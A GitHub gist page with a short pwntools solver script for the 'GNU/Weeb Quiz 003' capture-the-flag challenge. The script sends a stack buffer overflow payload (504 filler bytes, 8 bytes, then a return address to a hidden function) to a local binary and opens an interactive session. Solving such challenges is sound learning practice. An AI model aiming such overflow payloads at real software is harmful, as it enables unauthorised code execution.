-
-
Save febnug/1756fbb65a2a7799fb22cb236d69e2d4 to your computer and use it in GitHub Desktop.
Solver GNU/Weeb Quiz 003
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Download quiz : https://gnuweeb.org/quiz/003 | |
from pwn import * | |
a = process("./003") | |
sec_func = p64(0x04010B9) | |
payload = "\x41" * 504 + "\xff" * 8 + sec_func | |
a.sendline(payload) | |
a.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment